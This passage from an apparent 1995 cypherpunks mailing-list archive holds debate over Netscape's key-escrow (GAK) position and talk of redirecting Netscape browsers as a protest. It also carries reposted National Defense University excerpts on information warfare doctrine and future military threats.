> jsw@netscape.com - http://home.netscape.com/people/jsw
> Any opinions expressed above are mine.
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:25:10 +0800
To: "Dr. Frederick B. Cohen" <fc@all.net>
Subject: Re: Info on Netscape's key escrow position
In-Reply-To: <9512021318.AA27932@all.net>
Message-ID: <Pine.SUN.3.91.951202140947.1199C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Dr. Frederick B. Cohen wrote:

> The point Netscape seems to miss is that by refusing to go with weak
> crypto and having the best product on the market, Netscape may be able
> to force these governments into a position of accepting it.

[...]

> The right move for Netscape is to improve crypto-security, to refuse to
> give in to government, and to publicly vilify the people in government
> who stand in their way.  When billions of dollars are at stake and the
> blame is placed squarely on the shoulders of a politician trying to
> claim economic improvements based on their policies, the politician is
> likely to yield.


"Gee, I dunno, that sounds like a lot of work, and well, I'm making good 
dough.  Sure, it would be a boon for the company, and fit right in with 
the mainstream perception that government way too involved in Joe 
Random's life, and win or lose, either way it would be a major public 
relations coup, and would restore the confidence of many foreign 
customers concerned about U.S. economic intelligence goals, but well... it 
just sounds so... subversive.

Honey, could you pass the jam?"

> 
> 
> -> See: Info-Sec Heaven at URL http://all.net/
> Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Sun, 3 Dec 1995 04:33:47 +0800
To: cypherpunks@toad.com
Subject: Re: Barring access to Netscape
Message-ID: <199512022022.OAA19354@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


>> >Shouldn't be too hard to hack this into Apache.
>
>	Should my commercial release of Apache/SSL include this? ;-)
>(I could make it into a configuration option, so that if the
>User-Agent is Mozilla, it passes Back a Refresh: header with the
>response....)

Well, I think configurable redirects based on User-Agent would be a good
thing.  However, if you don't control the server being used you can still
use client pull to redirect on a page-by-page basis.  I've been made aware
of at least one non-Netscape browser that does client pulls, so checking the
User-Agent would be desirable, but (AFAIK) that isn't possible without
modifying the server, using cgi, or something along those lines.

I've got the perl script to automatically add (and remove) the meta-http lines
to individual pages more or less done, but I won't release it just yet
(if at all).  Jeff Weinstein's promise to make Netscape's GAK policy
publically available is an important step in the right direction.  However,
whatever their policy statement ends up saying, it should be obvious that their
level of commitment to opposing GAK is minimal at best.


                          | (Douglas) Hofstadter's Law:
Frank Stuart              | It always takes longer than you expect, even 
fstuart@vetmed.auburn.edu | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 3 Dec 1995 03:48:06 +0800
To: cypherpunks@toad.com
Subject: Cypher secure versus computationally unbounded adversary
Message-ID: <9512021931.AA01944@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Hi all,

I've just come up with a method for implementing and encryption algorithm
that is absolutely secure from passive attacks by a computationally
unbounded adversary. Is this a new capability, or am I reinventing the
wheel here?

Thanks,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:50:09 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <ace5cd0216021004c8fd@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.951202142227.1199D-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Timothy C. May wrote:

> At 8:33 AM 12/2/95, sameer wrote:
> >>
> >> So, for a 15% reduction in salary and 30 days of job search, is it worth it?
> >
> >        30 days? in silicon valley? you *must* be joking. (i suppose
> >the market for good net-folks isn't as big over on the right coast.)
> 
> Just a minor clarification. I don't speak for any of the Netscape employees
> here (nor am I encouraging them to leave...they cay do *more* within
> Netscape than merely be resigning in some sort of protest).

[...]

> I'm critical of Netscape, like others are, on various issues. But I sure do
> hope we never turn this criticism into suggestions that Jeff and the other
> Netscape folks here should quit in protest. That smacks too much of "you're
> working for the war machine!" stridency. (Next we'll be having people dump
> buckets of blood over piles of Netscape Navigator at Fry's.)

The point that should have come across was that it is hyprocracy for the 
Netscape employee to proport to be a strong crypto supporter of any great 
degree when the phrase 'the money is more important to me' could be applied.

I tend to agree that the resulting effect was instead a version of "if 
your not a part of the solution, you're part of the problem."

I just get sick of those who tout themselves as Experts in Software 
Munitions and are in fact are merely in it for the cash.  In it for the 
cash is just fine.  Just don't tell me later you aren't.

I don't care if Netscape makes a pile of money as of now.  Until they 
show themselves as a company with backbone in the area I consider 
important, my investment dollar goes elsewhere.

> 
> I read the Jim Clark statement that Jeff forwarded. It seemed noncomittal
> on the actual issue of whether Netscape will build a U.S.-supported GAK (as
> opposed to offering GAK for the Iraqis or French). I await with interest
> the clarification of the anti-GAK stance that Jeff alluded to.

I believe you got it with:

"If the law requires GAK, then I believe that we will implement it rather
than just disable encryption."

Note that the phrase is entirely ambigious on whether this refers to the 
law requiring GAK for export, or export AND domestic sales.  Netscape 
will install GAK into whatever will increase its sales.  I understand 
and respect this position in the context of a company which needs 
badly to start raking in some profits.  

The title "Software Munitions Expert" or similar such should probably be 
changed to "GAK marketing expert" however.

> --Tim May
> 
> Views here are not the views of my Internet Service Provider or Government.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> Corralitos, CA              | knowledge, reputations, information markets,
> Higher Power: 2^756839      | black markets, collapse of governments.
> "National borders are just speed bumps on the information superhighway."
 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: solman@MIT.EDU
Date: Sun, 3 Dec 1995 03:52:21 +0800
To: solman@MIT.EDU
Subject: Re: Cypher secure versus computationally unbounded adversary
In-Reply-To: <9512021931.AA01944@ua.MIT.EDU>
Message-ID: <9512021936.AA01996@ua.MIT.EDU>
MIME-Version: 1.0
Content-Type: text/plain


What I meant to say, was that the encryption protocol is secure versus
a computationally unbounded passive adversary AND REQUIRES NO PRIOR
COMMUNICATION.

Sorry 'bout that,

Jason W. Solinsky




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 03:56:17 +0800
To: Lance Cottrell <loki@obscura.com>
Subject: Re: Netscape GAK page.
In-Reply-To: <ace657a40802100417e5@[137.110.24.250]>
Message-ID: <Pine.SUN.3.91.951202143940.1199F-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, Lance Cottrell wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> 
> I have gone back and improved the "Netscape GAK?" page based on a good
> nights sleep and some helpful suggestions (thanks you all who mailed me
> about the page). I would appreciate feedback on the page, especially from
> Netscape or its employees (in an official or unofficial capacity). I have
> tried to be even handed in my presentation of the information, while not
> hiding the fact that I strongly disagree with the stance that Netscape has
> taken.

If you are interested in a scathing essay on Netscape and its 
responsibilities (in my view) for opposing GAK for the page, I will write 
one for you free of charge....

> 
> <http://www.obscura.com/~loki/GAK.html>
> 
>         -Lance
> 
> 
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.2
> 
> iQEVAwUBMMCoVPPzr81BVjMVAQF5vQf/R1AgxAEhjR8AkD29WbRFHqA7wpw5R6dq
> B2YJGM9J2g5g9y6gf/YKTGVp/Lp4qmExhi3zZPkOsHefF/xufBZ7N42depO9F0dS
> cqGcCq8+qhTYeNhjjqMn1DgM9oeuVJdDCF1KUonUhQiiWthTAlgFLsWwcQznq7FK
> J533laBREzrXmxAQbfxnw/cc7J9wRPuzUgDQ61RlO8x1VtZxugSvbVpFDpDBYL1A
> W028bnKJfK52cp6nliKjjk6k5ElccPsLk82mS0Fyhfh+Gt4QMLx+UHuKgaVwGHsa
> m6sAXMxuWDg2x3myW0NKxs8qj9hDZzwG4T7/QFSKbkQkQGFIvWa+Fw==
> =h3v6
> -----END PGP SIGNATURE-----
> 
> ----------------------------------------------------------
> Lance Cottrell   loki@obscura.com
> PGP 2.6 key available by finger or server.
> Mixmaster, the next generation remailer, is now available!
> http://obscura.com/~loki/Welcome.html or FTP to obscura.com
> 
> "Love is a snowmobile racing across the tundra.  Suddenly
> it flips over, pinning you underneath.  At night the ice
> weasels come."
>                         --Nietzsche
> ----------------------------------------------------------
> 
> 
> 

---
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Aleph One <aleph1@dfw.net>
Date: Sun, 3 Dec 1995 05:15:18 +0800
To: cypherpunks@toad.com
Subject: Netscape Feeding Frenzy
Message-ID: <Pine.SUN.3.91.951202145657.22791B-100000@dfw.net>
MIME-Version: 1.0
Content-Type: text/plain


	It sad to see to many bright people trial and condem a company
or its employees in such a short time and with so little evidense.
Yes, I like you, dont want to see GAK on Netscape products. But this
is ridiculous. It reminds me of the Microsoft Win95 fiasco. (And I do hate
Microsoft). Remember all the heat they took just because someone claimed
that the installation software took a snapshoot of your system and network
and then gave it to Microsoft through the MSN. It even made it into trade
magazines like InformationWeek. Of curse they then had their tail between
their legs when they realized that it was just the registration wizard
that asked for permission and that the information uploaded was much
less intrusive.

Aleph One / aleph1@dfw.net
http://underground.org/
KeyID 1024/948FD6B5 
Fingerprint EE C9 E8 AA CB AF 09 61  8C 39 EA 47 A8 6A B8 01 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@polaris.mindport.net>
Date: Sun, 3 Dec 1995 05:11:45 +0800
To: sameer <sameer@c2.org>
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <199512021936.LAA09776@infinity.c2.org>
Message-ID: <Pine.SUN.3.91.951202155101.4012A-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 2 Dec 1995, sameer wrote:

> > 
> > With which firm?  Or have you made it an in-house effort?
> > 
> 
> 	There was no Netscape (or RSADSI, for that matter [an RSADSI
> employee showed up, but it was on his own time]) representative at the
> recent Bernstein hearing in SF. I think that shows how much they
> really care.

While I suspected this, I don't think we needed it to show us how much 
they really care.  It seems fairly obvious from the outset.


> 
> -- 
> sameer						Voice:   510-601-9777
> Community ConneXion				FAX:     510-601-9734
> The Internet Privacy Provider			Dialin:  510-658-6376
> http://www.c2.org/ (or login as "guest")		sameer@c2.org
> 

---
My prefered and soon to be permanent e-mail address: unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 23:11:29 +0800
To: cypherpunks@toad.com
Subject: Gibson Warfare
Message-ID: <199512021503.QAA14471@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/forum28.html


   Forum, Number 28, May 1995 
   
  WHAT IS INFORMATION WARFARE?
  
   Martin C. Libicki, National Defense University
   
   
   Is Information War (IW) a nascent, perhaps embryonic art, or 
simply
   the newest version of a time-honored feature of warfare? Is 
it a new
   form of conflict that owes its existence to the burgeoning 
global
   information infrastructure, or an old one whose origin lies 
in the
   wetware of the human brain but has been given new life by 
the
   information age? Is it a unified field or opportunistic 
assemblage?
   
   Since March 1993, Chairman of the Joint Chiefs of Staff 
Memorandum of
   Policy Number 30 (MOP 30) has set forth definitions and 
relationships
   that have guided the joint community in its thinking about 
the related
   concepts of information warfare and command and control 
warfare. As
   these seminal ideas have evolved, their definitions and 
relationships
   have changed as well. MOP 30 is under revision, and both 
higher level
   policy documents for the Department of Defense and doctrinal
   publications of the Joint Staff and Services are either in 
draft form
   or under revision.
   
   In light of the unformed state of these concepts, 
alternative
   definitions and taxonomies for twenty-first century warfare 
are
   proposed:
   
    1. command-and-control warfare [C2W];
       
    2. intelligence-based warfare [IBW];
       
    3. electronic warfare [EW];
       
    4. psychological operations [PSYOPS];
       
    5. hackerwar software-based attacks on information systems;
       
    6. information economic warfare [IEW] war via the control 
of
       information trade; and
       
    7. cyberwar [combat in the virtual realm]. ...
       
------------------

   
URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch07.html

Hacker Warfare


   The hacker attacks discussed here are attacks on civilian 
targets
   (military hacker attacks come under the rubric of C2 
warfare). Note 41
   Although attacks on civilian and military targets share some
   characteristics of offense and defense, military systems 
tend to be
   more secure than civilian systems, because they are not 
designed for
   public access. Critical systems are often disconnected from 
all others
   -- "air gapped," as it were, by a physical separation 
between those
   system and all others.
   
   
   From an operational point of view, civilian systems can be 
attacked at
   physical, syntactic, and semantic levels. Here, the focus is 
on
   syntactic attacks, which affect bit movement. Concern for 
physical
   attacks (see above, on C2W) is relatively low Note 42 
(although some
   big computers on Wall Street can be disabled by going after 
the little
   computers that control their air-conditioning). Semantic 
attacks
   (which affect the meaning of what computers receive from 
elsewhere)
   are covered below, under cyberwarfare.
   
   
   Hacker warfare can be further differentiated into defensive 
and
   offensive operations. The debate on defensive hacker warfare 
concerns
   the appropriate role for the DoD in safeguarding nonmilitary
   computers. The debate on offensive hacker warfare concerns 
whether it
   should take place at all. In contrast to, say, proponents of 
tank or
   submarine warfare, only a few hackers argue that the best 
defense
   against a hacker attack is a hacker attack.
  
   
   Whether hacker warfare is a useful instrument of policy is a 
question
   that defense analysts and science fiction writers may be 
equally well
   placed to answer. Hacker warfare would, without doubt, be a 
new form
   of conflict ...

-----------------

URL: http://www.ndu.edu/ndu/inss/actpubs/act003/a003ch09.html

   
Cyberwarfare

   
   Of the seven forms of information warfare, cyberwarfare -- a 
broad
   category that includes information terrorism, semantic 
attacks,
   simula-warfare and Gibson-warfare -- is clearly the least 
tractable
   because by far the most fictitious, differing only in degree 
from
   information warfare as a whole. The global information 
infrastructure
   has yet to evolve to the point where any of these forms of 
combat is
   possible; such considerations are akin to discussions in the 
Victorian
   era of what air-to-air combat would be. And the 
infrastructure may
   never evolve to enable such attacks. The dangers or, better, 
the
   pointlessness, of building the infrastructure described 
below may be
   visible well before the opportunity to build it will present 
itself. ...
   
   
   The difference between a semantic attack and hacker warfare 
is that
   the latter produces random, or even systematic, failures in 
systems,
   and they cease to operate. A system under semantic attack 
operates and
   will be perceived as operating correctly (otherwise the 
semantic
   attack is a failure), but it will generate answers at 
variance with
   reality.
  
   
   The possibility of a semantic attack presumes certain 
characteristics
   of the information systems. Systems, for instance, may rely 
on sensor
   input to make decisions about the real world (e.g., nuclear 
power
   system that monitors seismic activity). If the sensors can 
be fooled,
   the systems can be tricked (e.g., shutting down in face of a
   nonexistent earthquake). Safeguards against failure might 
lie in, say,
   sensors redundant by type and distribution, aided by a wise
   distribution of decisionmaking power among humans and 
machines.
   
   
  GIBSON-WARFARE

   
   The author confesses to having read William Gibson's 
Neuromancer
   Note 61 and, worse, to having seen the Disney movie "TRON." 
In both,
   heroes and villains are transformed into virtual characters 
who
   inhabit the innards of enormous systems and there duel with 
others
   equally virtual, if less virtuous. What these heroes and 
villains are
   doing inside those systems or, more to the point, why anyone 
would
   wish to construct a network that would permit them to wage 
combat
   there in the first place is never really clear.
   
   
   Why bring up Gibson's novel and the Disney movie? Because to 
judge
   what otherwise sober analysts choose to include as 
information warfare
   -- such as hacker warfare or esoteric versions of 
psychological
   warfare -- the range of what can be included in its 
definition is
   hardly limited by reality. ...
   
   
   Possible? Actually, yes. Relevant to national security? Not 
soon.
   





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sat, 2 Dec 1995 23:25:28 +0800
To: cypherpunks@toad.com
Subject: Info Foes
Message-ID: <199512021516.QAA15201@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/z1106.html


   Strategic Forum
   
                      THE REVOLUTION IN MILITARY AFFAIRS
                                       
   Martin Libicki, CDR James Hazlett, et al.

[Excerpts]
       
  DISCUSSION I: STRATEGIC CHALLENGES
  
   Those who assess future strategic challenges tend to look to 
Asian
   countries, and to categorize competitors as peer, regional, 
or niche.
   
    Asia and the Nation-State
    
    Most conference participants believe that, over the next 
twenty
   years, the fulcrum of world politics will continue to shift 
from
   Europe and its peripheries to the Asia-Pacific region. The 
period of
   European dominance produced innumerable wars as various 
countries
   challenged each other for power, resources, and sovereignty. 
With the
   formation of the European Union and the dissolution of the 
Warsaw
   Pact, great power rivalry in particular and the nation-state 
in
   general are fading somewhat in importance.
   
   The nation-state remains strong in Asia, however. The last 
fifty years
   have seen considerable economic progress as various nations 
have made
   themselves richer by grasping the secrets of rapid 
industrialization.
   This trend, which started in Japan in the 1950s and 1960s, 
spread to
   the Tigers in the 1970s, ASEAN countries in the 1980s, and 
China and
   perhaps India in the 1990s, has left no Asian country 
unaffected.
   Economic growth, however, has not made the nation-state 
obsolete. To
   the contrary, the nation-state has been instrumental in 
creating the
   internal and external conditions for economic growth. 
European history
   suggests that countries, once they taste wealth, will 
struggle for
   power. Will Asian countries follow that pattern or 
demonstrate new
   models of what the nation-state is capable of? ...
   
    Types of Competitors
    
   One taxonomy of future threats suggested at the conference 
is to
   classify potential competitors as peer, regional, or niche. 
A peer
   competitor could challenge our military across the board. A 
niche
   competitor would be incapable of doing so, but would strive 
to inhibit
   or defeat U.S. intervention by developing capabilities such 
as
   primitive weapons of mass destruction, sensor blinders, 
physical
   terrorism, information system attacks, psychological 
operations, or
   hostage maneuvers. ...
   
  DISCUSSION II: OPERATIONAL CHALLENGES
  
   Considerable evidence suggests that commercial access to 
information
   -- GPS readings, space-based imagery, and Internet data -- 
could be
   transformed into military advantage thereby levelling the 
playing
   field between ourselves and our potential opponents. Other 
dual-use
   technologies, for instance, those that would permit remote 
piloting of
   aerial vehicles, permit commercial technologies such as 
electronic
   video photography to act as powerful military tools 
accessible to all
   (RPVs are made in more than thirty countries).
   
    Technologies That Level the Field
    
   Does the proliferation in information technologies 
necessarily negate
   our current military lead? Information-based warfare creates 
new
   vulnerabilities for industrial-age institutions slow to 
adapt. Because
   most U.S. logistics facilities and command nodes are not 
well hidden,
   they are vulnerable to precision strike. The widespread 
availability
   of overhead imagery coupled with GPS integration into weapon 
systems--
   no more than a few years away for countries such as 
India--poses a
   serious threat to which our improving defensive measures 
(e.g.,
   anti-tactical ballistic missiles) will provide only a 
partial solution
   
   . Our own counter-C2 operations are complicated by the 
rapidly falling
   cost of bandwidth and redundancy. Even if 90 percent of a 
bit flow can
   be interdicted, the remaining 10 percent may suffice for 
operational
   uses. Rapid expansion of cellular nodes, particularly 
through
   exploitation of commercial space assets, may make targeting 
and
   communications denial difficult or impossible. Multiple 
channels of
   electronic access will also complicate psychological 
operations and
   countermeasures.
   
    With the advent of the global information infrastructure, a 
clever
   adversary could take advantage of open information systems 
to enhance
   its own communications, information, navigation, 
intelligence, and
   operational support: examples include GPS, one-meter 
imagery, weather
   data, and even CNN. Every year more information with 
potential
   military use can be gleaned by anyone from the Internet 
without
   leaving fingerprints. How easily can a country's access to 
the global
   satellite communications networks be blocked? The coming 
global
   information infrastructure will have many points of entry. 
It will
   also be difficult to curtail certain services (e.g., global
   navigation) without denying them to U.S. users or even our 
own
   national security establishment.
   
    Technologies that Keep Us Ahead
    
   The United States, nevertheless, retains an edge in two 
important
   areas: space and systems integration. Space systems are 
relatively
   difficult to build and although many potential middle-income
   adversaries can borrow space services from third parties, 
fewer can
   own satellites, and far fewer can launch them. Thus the 
United States
   will retain a clear edge in the size and sophistication 
(timeliness
   and interpretation) of space capabilities, in their adoption 
and
   adaptation for military uses, in their augmentation or 
adaptation for
   the particulars of future contingencies, and in the 
assurance of their
   continuity.
   
   The distinctions between data and information, and between 
information
   and knowing could also favor U.S. forces. There are vast 
differences
   between, for instance, access to meteorological imagery and
   determining, for instance, that a locus of operations is 
likely to be
   fogged in 24 hours hence (a distinction relevant to the 
Falklands
   campaign). The art of operational planning is not acquired
   automatically with the acquisition of computers. Similarly, 
as sensors
   proliferate in type as well as numbers, data fusion is 
likely to
   become more decisive in future conflicts. ...

   
POLICY RECOMMENDATIONS

    Two conference threads merit further examination:

     * U.S. defense policies that make it more difficult for 
potential
       competitors to threaten their neighbors and hold off the 
United
       States at the same time may be worth pursuing for that 
fact alone.

     * If militarily relevant information technologies are 
everywhere,
       sophistication at using them may be a better predictor 
of how
       challenging a competitor may become for the United 
States.
       Therefore, in addition to worrying about how large 
future foes are
       (and sizing our own forces accordingly), we should also 
focus on
       the potential sophistication of our foes (and develop 
doctrine
       accordingly).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 09:17:54 +0800
To: pcw@access.digex.net (Peter Wayner)
Subject: Re: Why Netscape employees should not leave...
In-Reply-To: <v02130502ace652b201d3@[199.125.128.5]>
Message-ID: <199512030035.QAA14181@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Nor are HTTP servers.

	http://www.c2.org/apachessl/. Commercial availability within a
week or two. (Yeah, I know, I've been saying that for a while. This
time I *really* mean it. ;-)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 09:02:45 +0800
To: cypherpunks@toad.com
Subject: Re: Info on Netscape's key escrow position
Message-ID: <2.2b7.32.19951203004908.0087902c@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:01 PM 12/1/95 -0800, you wrote:
>
>  I had lunch with Jim Clark today, and explained the furor that was
>currently going on in cypherpunks and elsewhere.  After lunch he sent
>me the e-mail that I've attached below to pass along.  I think the gist
>of it is that if governments require key escrow, we will have to do it
>in order to sell our products with encryption into those countries.
[rest removed for brevity]

Well someone has to say it...

"I am glad to see that Jim Clark is no longer hocking up GAK."

I just hope Netscape does not get seduced by the dark side of the feds and
impliment GAK "because they have to".  It is one thing to have cryptography
that is brute forcable in a few weeks, it is another to have a secret key
that some nosey government agent use to decrypt it in seconds.  If Netscape
impliments GAK I will move to something else because I will not be able to
trust that some other nasty surprise will exist in the software.  (As well
as having no real security left in the product.)

Do I beleive that Netscape will impliment GAK in the near future?  Not
really.  Not unless they go through another purge like the one back in
February(?), but I do not see that as being very likely.  (With the current
IPO, news of a employee purge would probibly drive down the stock and that
would be the last thing the top brass would want.)
|       What is the Eye in the Food Pyramid?      | alano@teleport.com   |
|"The moral PGP Diffie taught Zimmerman unites all| Disclaimer:          |
| mankind free in one-key-steganography-privacy!" | Ignore the man       |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 3 Dec 1995 09:09:16 +0800
To: cypherpunks@toad.com
Subject: Re: Getting a copy of the Jim Clark speech
Message-ID: <2.2b7.32.19951203004910.00868478@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 09:47 PM 11/29/95 -0800, you wrote:
>At 09:43 PM 11/30/95 -0600, Frank Stuart wrote:
>> I'm working on an "obnoxify" program to convert 
>> normal html documents into documents that look 
>> normal to non-netscape browsers, but are too painful to
>> read with netscape (</BLINK>, <FONT SIZE=1>, etc.).  
>> I think tomorrow evening would be a good time to decide 
>> whether or not to distribute it.
>
>Is there any way one could set up a dirty pictures web
>page in such a fashion that it would be difficult, painful,
>and impractical to get at the pictures through that page
>with a netscape browser?

It would not be very hard.  You just need to have all connections go through
a CGI script first.  There is a variable that reports the client to the
server.  Just bounce them to an error if the variable starts with "Mozilla".

Also, you do not need access to the server code to do this if you are using
NCSA.  There is a way you can force execution of CGI scripts from your local
directory using an .htaccess file.  (It requires using an "addtype" command
to enable the cgi parsing.)  I will have to dig out the exact mime type
required.

If I get some working Netscape bounce code, I will post it here.  (Actually
I want one that bounces AOL users to the Mr. Rogers home page on pbs.org.)
|      Poly wants *more* than one cracker!        | alano@teleport.com   |
|"It's only half a keyserver. I had to split the  | Disclaimer:          |
|other half with the government man." - R. Rococo |   Ignore the man     |
|`finger -l alano@teleport.com` for PGP 2.6.2 key |  behind the keyboard.|
|         http://www.teleport.com/~alano/         |       <fnord>        |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Sun, 3 Dec 1995 09:16:00 +0800
To: jsw@netscape.com (Jeff Weinstein)
Subject: Re: GAK Flap Happening at a Good Time--Journalists Read!
In-Reply-To: <30C0EF90.132D@netscape.com>
Message-ID: <199512030053.QAA15582@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


>   How would having an official representative from Netscape in
> the audience have influenced the outcome of the proceedings?  I would

	It's called moral support for our lawyers. Cindy mentioned
after the hearing at lunch how much it helped to have people in the
audience. Having official people from industry would probably have
helped her morale even more.

> have liked to attend, but was in the process of trying to get
> a beta release out at the time.

	Ah, I see, so the short-term goal of making sure a beta
release isn't one day late takes precedence over the long term future
of cryptography. (And, essentially, your company's long term profits.)

-- 
sameer						Voice:   510-601-9777
Community ConneXion				FAX:     510-601-9734
The Internet Privacy Provider			Dialin:  510-658-6376
http://www.c2.org/ (or login as "guest")		sameer@c2.org




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 3 Dec 1995 00:41:30 +0800
To: cypherpunks@toad.com
Subject: Four Info Threats
Message-ID: <199512021625.RAA16934@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



URL: http://www.ndu.edu/ndu/inss/strforum/forum35.html


   Forum, Number 35, July 1995
   
 
                               THE NEXT ENEMY
                                       
   Martin C. Libicki, National Defense University

[Excerpts]
   
   The Cold War offered military planners considerable 
strategic clarity
   the threat was known, and the problem was generating a force 
structure
   of sufficient size and sophistication to counter it. Today's 
military
   threats are varied and, for the most part, well below the 
level that
   even a shrinking U.S. force can handle comfortably. Threats 
ten to
   twenty years out, however, must be taken seriously because 
of the long
   time required to complete a major systems acquisition; to 
develop,
   test, and institutionalize new doctrine; and to accomplish 
the
   organizational innovations necessary to use both 
effectively.
   
   Future threats may be divided into four categories: peers, 
bullies,
   terrorism, and chaos. ...
   
   Peers
   
   Few planners think it likely that the next twenty years will 
see a
   reemergence of a nation that can pose a challenge to U.S. 
military
   power as broadly as the Soviet Union did. However, at least 
two
   countries (Russia and China) could conceivably be peer 
adversaries at
   the strategic level of nuclear weapons, space, and 
information
   systems.  ...
   
   Another avenue of future competition may be information 
warfare. Can
   or should the United States hold other nations' 
participation in the
   world economy at risk? The United States might be able to 
shut down
   another nation's banking system but not without risk of 
collateral
   damage to the global banking system. Can physical war be 
replaced by a
   survival contest among rival information systems under 
attack? Perhaps
   the United States should concentrate on developing defensive 
systems.
   The United States has the biggest stones, but also the most 
glass in
   its house. ...
   
   A world of peer strategic competition would drive the 
military in
   familiar directions towards: nuclear forces, satellites and 
other
   long-range warning systems; tactical ballistic missile 
defense systems
   (including for allies); perhaps strategic defense systems 
and space
   attack systems; air defense in general; information warfare 
and
   security; and robust command-and-control.
   
   Bullies
   
   If the circumstances and logic of the Bottom Up Review hold 
true for
   two more decades, U.S. armed forces will be sized and 
structured
   primarily to engage in two simultaneous major regional 
contingencies
   (MRCs). The usual suspects in such MRCs (e.g., Iran, Iraq, 
North
   Korea) are presently unsophisticated rogue states that 
aspire to
   nuclear weapons and delivery systems. Conference 
participants believe
   that U.S. forces could cope with the challenges of future 
conventional
   warfare, even if force levels continue to diminish. However, 
two
   events would make the United States rethink its strategy 
nuclear
   weapons proliferation, and the sophisticated exploitation of 
world
   technology markets. ...
   
   Alternatively, an MRC opponent may be able to avoid going to 
the
   nuclear threshold by a strategy which uses smart munitions, 
commercial
   command-and-control, and a variety of surveillance 
technologies (e.g.,
   unmanned aerial vehicles, third-party satellite 
surveillance) to exact
   damaging casualties on U.S. forces. ...
   
   Against a sophisticated
   regional foe, the United States might not want to use 
platforms at all
   but rely on a combination of stand-off attack forces, and
   information-based warfare assets (for giving targeting data 
to local
   coalition partners), coupled with special operations forces 
used for
   liaison and other tasks.
   
   Terrorism
   
   Largely because of the limited capability that classical 
military
   instruments have in coping with terrorism, conference 
participants
   kept returning to the threat that it may pose to U.S. 
national
   security. Incidents may range from the use of conventional 
explosives
   (e.g., what if the van in the World Trade Center explosion 
had been
